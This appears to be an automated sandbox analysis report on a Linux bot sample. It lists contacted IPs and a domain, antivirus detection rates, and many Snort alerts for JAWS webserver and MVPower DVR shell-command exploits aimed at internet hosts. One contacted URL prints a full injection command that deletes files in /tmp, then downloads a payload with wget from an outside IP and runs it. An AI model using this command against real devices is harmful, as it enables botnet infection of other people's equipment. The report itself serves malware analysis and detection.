174.67.133.238	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
41.61.164.252	unknown	South Africa	36943	GridhostZA	false
37.98.140.246	unknown	Finland	57732	IPPOY-ASFI	false
152.113.180.106	unknown	United States	4193	WA-STATE-GOVUS	false
42.204.186.204	unknown	China	7641	CHINABTNChinaBroadcastingTVNetCN	false
42.4.251.174	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
109.7.133.227	unknown	France	15557	LDCOMNETFR	false
123.145.54.222	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
112.180.205.190	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
47.105.148.45	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
38.162.241.85	unknown	United States	174	COGENT-174US	false
96.104.187.63	unknown	United States	7922	COMCAST-7922US	false
5.142.43.27	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
156.240.70.1	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
158.163.60.230	unknown	Canada	1930	RCCNFundacaoparaaCienciaeaTecnologiaIPPT	false
206.112.107.64	unknown	United States	11486	COLO-PREM-VZBUS	false
168.2.58.209	unknown	United States	8	RICE-ASUS	false
182.235.102.243	unknown	Taiwan; Republic of China (ROC)	9416	MULTIMEDIA-AS-APHoshinMultimediaCenterIncTW	false
197.50.174.117	unknown	Egypt	8452	TE-ASTE-ASEG	false
160.12.51.133	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
150.94.128.87	unknown	Japan	6400	CompaniaDominicanadeTelefonosSADO	false
79.101.206.56	unknown	Serbia	8400	TELEKOM-ASRS	false
210.232.162.151	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
37.129.242.246	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
52.35.26.205	unknown	United States	16509	AMAZON-02US	false
57.171.197.28	unknown	Belgium	2686	ATGS-MMD-ASUS	false
84.184.1.125	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
148.94.50.51	unknown	United States	786	JANETJiscServicesLimitedGB	false
31.241.9.128	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
5.107.178.204	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	false

Contacted Domains

Name	IP	Active
scamanje.stresserit.pro	49.12.233.52	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for submitted file

Source: 9o6Z1wEokT	Virustotal: Detection: 32%			Perma Link
Source: 9o6Z1wEokT	ReversingLabs: Detection: 35%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53120 -> 138.68.131.225:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53120 -> 138.68.131.225:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34640 -> 104.82.201.117:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46986 -> 156.213.55.108:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34640 -> 104.82.201.117:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.82.201.117:80 -> 192.168.2.23:34640
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54050 -> 104.115.139.217:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46986 -> 156.213.55.108:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49492 -> 210.99.207.176:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38716 -> 198.73.227.211:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54050 -> 104.115.139.217:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.115.139.217:80 -> 192.168.2.23:54050
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56750 -> 52.70.231.13:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49492 -> 210.99.207.176:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56750 -> 52.70.231.13:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57520 -> 104.104.60.154:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57520 -> 104.104.60.154:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.104.60.154:80 -> 192.168.2.23:57520
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60060 -> 8.210.248.86:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60530 -> 163.43.106.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60060 -> 8.210.248.86:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60530 -> 163.43.106.234:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42404 -> 197.13.239.56:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42404 -> 197.13.239.56:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45884 -> 185.17.248.122:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45884 -> 185.17.248.122:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53182 -> 23.198.77.7:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53182 -> 23.198.77.7:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.198.77.7:80 -> 192.168.2.23:53182
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55338 -> 192.240.170.144:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35240 -> 34.73.70.70:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55338 -> 192.240.170.144:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32902 -> 96.7.166.199:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35240 -> 34.73.70.70:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32902 -> 96.7.166.199:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 96.7.166.199:80 -> 192.168.2.23:32902
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48200 -> 104.108.128.83:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54216 -> 88.148.100.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48452 -> 103.114.55.23:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54216 -> 88.148.100.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37910 -> 184.24.49.150:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39786 -> 149.129.92.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57204 -> 75.118.157.75:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48200 -> 104.108.128.83:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.108.128.83:80 -> 192.168.2.23:48200
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54760 -> 142.234.150.237:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33438
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37910 -> 184.24.49.150:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.24.49.150:80 -> 192.168.2.23:37910
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57204 -> 75.118.157.75:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48452 -> 103.114.55.23:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54760 -> 142.234.150.237:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39786 -> 149.129.92.30:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33482
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33518
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33554
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55204 -> 104.156.244.175:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41710 -> 45.86.69.26:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39310 -> 197.15.65.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55204 -> 104.156.244.175:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39310 -> 197.15.65.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41710 -> 45.86.69.26:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36600 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36600 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42620 -> 18.66.249.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34734 -> 104.102.53.44:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42620 -> 18.66.249.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52076 -> 95.216.219.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37190 -> 92.122.201.80:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34734 -> 104.102.53.44:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.102.53.44:80 -> 192.168.2.23:34734
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37190 -> 92.122.201.80:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.122.201.80:80 -> 192.168.2.23:37190
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41626 -> 45.242.108.103:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52076 -> 95.216.219.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38766 -> 194.105.116.8:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54942 -> 50.202.79.65:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50606 -> 155.138.246.9:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37074 -> 209.251.91.133:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50146 -> 108.160.178.221:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41626 -> 45.242.108.103:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 195.162.70.50:23 -> 192.168.2.23:49088
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38766 -> 194.105.116.8:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46974 -> 116.92.244.142:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60680 -> 166.130.141.157:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41604 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50606 -> 155.138.246.9:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50146 -> 108.160.178.221:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52148 -> 49.212.233.81:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60680 -> 166.130.141.157:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46974 -> 116.92.244.142:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 116.92.244.142:80 -> 192.168.2.23:46974
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41634 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41604 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.150.151:80 -> 192.168.2.23:41604
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52148 -> 49.212.233.81:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41634 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.150.151:80 -> 192.168.2.23:41634
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36702 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49090 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51006 -> 139.30.254.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39674 -> 178.168.67.90:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49090 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49090
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51006 -> 139.30.254.30:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36702 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49380 -> 152.13.135.50:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46316 -> 85.215.82.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46316 -> 85.215.82.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39674 -> 178.168.67.90:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50128 -> 207.244.239.42:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47890 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60388 -> 138.68.241.177:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50128 -> 207.244.239.42:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47890 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59924 -> 103.89.23.61:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37508 -> 121.142.253.79:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60388 -> 138.68.241.177:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41718 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59924 -> 103.89.23.61:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37508 -> 121.142.253.79:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41718 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.150.151:80 -> 192.168.2.23:41718
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49142 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49142 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49142
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38546 -> 18.184.42.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49172 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41212 -> 34.107.199.90:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38546 -> 18.184.42.77:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41212 -> 34.107.199.90:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49172 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49172
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48230 -> 23.10.81.41:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38142 -> 37.19.206.73:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39954 -> 23.15.46.102:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48230 -> 23.10.81.41:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.10.81.41:80 -> 192.168.2.23:48230
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47938 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55762 -> 186.189.148.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38142 -> 37.19.206.73:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55700 -> 184.26.252.73:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39954 -> 23.15.46.102:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.15.46.102:80 -> 192.168.2.23:39954
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56364 -> 148.153.145.107:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47938 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55762 -> 186.189.148.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59908 -> 160.251.4.170:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56364 -> 148.153.145.107:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55700 -> 184.26.252.73:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.26.252.73:80 -> 192.168.2.23:55700
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59908 -> 160.251.4.170:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36840 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49266 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49266 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49266
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36840 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42736 -> 172.245.62.231:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55944 -> 78.24.213.83:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55944 -> 78.24.213.83:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42652 -> 103.163.195.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45918 -> 199.196.10.97:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42736 -> 172.245.62.231:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41446 -> 103.51.149.81:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42652 -> 103.163.195.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35602 -> 52.117.219.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41446 -> 103.51.149.81:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60654 -> 116.212.132.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35602 -> 52.117.219.197:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44846 -> 156.240.136.86:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60654 -> 116.212.132.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44846 -> 156.240.136.86:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33162 -> 82.165.68.118:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48526 -> 77.118.66.110:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33162 -> 82.165.68.118:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36804 -> 23.221.185.97:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46708 -> 104.16.240.1:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36804 -> 23.221.185.97:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.221.185.97:80 -> 192.168.2.23:36804
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36314 -> 178.79.132.110:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46708 -> 104.16.240.1:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42974 -> 72.246.67.227:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41754 -> 92.122.234.41:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57920 -> 80.78.24.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36314 -> 178.79.132.110:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59630 -> 178.154.224.180:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57868 -> 37.143.24.101:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57920 -> 80.78.24.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41754 -> 92.122.234.41:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.122.234.41:80 -> 192.168.2.23:41754
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59630 -> 178.154.224.180:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57868 -> 37.143.24.101:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42974 -> 72.246.67.227:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 72.246.67.227:80 -> 192.168.2.23:42974
